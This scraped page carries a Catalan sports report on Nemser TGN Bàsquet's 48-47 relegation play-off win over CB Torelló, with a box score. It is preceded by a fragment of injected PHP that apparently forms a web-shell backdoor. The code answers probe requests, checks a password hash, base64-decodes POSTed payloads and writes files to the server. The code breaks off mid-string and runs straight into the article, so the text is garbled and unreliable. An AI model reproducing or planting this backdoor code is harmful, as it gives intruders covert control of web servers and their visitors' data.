function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Una cistella de Gina Fort a mig segon del final dóna el primer triomf al Nemser TGN Bàsquet en el 'play-off' de descens (48-47) - Tgn Bàsquet Club -

Una cistella de Gina Fort a mig segon del final dóna el primer triomf al Nemser TGN Bàsquet en el ‘play-off’ de descens (48-47)

By
Updated: maig 24, 2014

Absolutament taquicàrdic. El final del partit entre el Nemser TGN Bàsquet i el Torelló va ser d’autèntic infart en un intercanvi de cistelles que va poder decantar el triomf cap a qualsevol dels dos bàndols. Una penetració  valenta, decidida i molt meritòria de Gina Fort contra la defensa visitant va permetre a la petita base del conjunt lila anotar els dos punts decisius quan només faltava mig segon pel final de matx i, d’aquesta manera, vèncer un partit que havia tingut color visitant. Gina va agafar la responsabilitat i tot anant cap a barraca va anotar contra tauler dos punts que poden valer el seu pes en or. De moment, aquest bàsquet situa el Nemser TGN Bàsquet amb 1-0 en aquest play-off de descens al millor de tres partits (qui guanyi dos mantindrà la categoria) a l’espera de visitar el conjunt osonenc, que va demostrar que és un autèntic os.

Abans de la jugada in extremis de Gina Fort, el Torelló havia glaçat les graderies del Pavelló del Sagrat Cor -l’afició lila va respondre a la crida feta des del club per donar suport a les noies que entrena Juan Carlos Arjona- amb una excel·lent jugada de pissarra. El Nemser s’havia avançat gràcies a un tir lliure de Mari Carme Martí. L’entrenador rival, a 16 segons del final i, amb 46-45 al marcador, va demanar temps mort per planificar una jugada. Li va sortir de cine. En quatre passades, el conjunt visitant va dibuixar una porta enrere perfecta que va deixar el Torelló al davant (46-47) a 5 segons i 8 dècimes del final. Semblava poc temps, era molt difícil, però Gina Fort ho va fer possible.

El matx va estar en mans del Torelló gairebé sempre. Les visitants van dominar el ritme de joc, evitant que el Nemser TGN Bàsquet pogués córrer, la seva principal arma, i, d’aquesta manera i amb un tempteig baix, va dur les regnes del matx (19-20 al descans). Era evident que el conjunt local necessitava accelerar el partit, però els nervis li estaven jugant una mala passada. Moltes pilotes perdudes, impresicions en el tir a curta distància, errades en els pocs contraatacs clars que va poder muntar, etc. Les visitants, per la seva banda, alternant individual i zona 2-3 en defensa i aprofitant l’envergadura de les seves interiors dins la zona, anaven fent. De tant en tant, un triple trencava la monotonia, i deixava el Nemser TGN Bàsquet estabornit (22-27, 23′). Les locals no estaven còmodes dins la pista i només la consistència d’Ona Fort -la millor jugadora del Nemser aquest curs- evitava que les visitants agafessin més renda. Una tècnica per allunyar la pilota a les visitants va ser clau. El marcador mostrava un preocupant 30-35 a 8 minuts del final. El Nemser va encistellar els dos tirs lliures i, després del pertinent servei de banda, Ona Fort va anotar un triple (35-35). El Nemser TGN Bàsquet ja havia decidit anar a totes, pressionant a tota la pista, fent dos contra un sempre que podia. Amb tot, el Torelló no va perdre la serenor ni les locals va llençar la tovallola, conscients de la importància del matx. Es va entrar en una dinàmica de punt a punt, de tirs lliures i de moments decisius. En l’enèsim final a cara o creu pel conjunt lila aquest curs, per fi, la sort el va afavorir. La permanència és a un sol triomf.

 

NEMSER TGN BÀSQUET       48

CB TORELLÓ      47

NEMSER TGN BÀSQUET: G. Fort (2), O. Fort (17), Vilamajor (8), García, M.C. Martí (7) -cinc inicial- Muñoz (8), Sicilia, Martínez (1), M. Martí (5) i Gómez. 3 triples: O. Fort, Vilamajor i M. Martí. 13/22 tirs lliures. 19 faltes.

CB TORELLÓ: Montero (2), Gracia (4), Erra (8), Portet (4), Alba (8) -cinc inicial- Badjl (2), Montero (14), Gelabere (2) i Palau (3). 5 triples: Montero i Alba (2), Palau. 6/16 tirs lliures. 24 faltes.

PARCIALS: 12-11, 7-9, 11-11 i 18-16.

ÀRBITRES: Belmonte i Galera

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *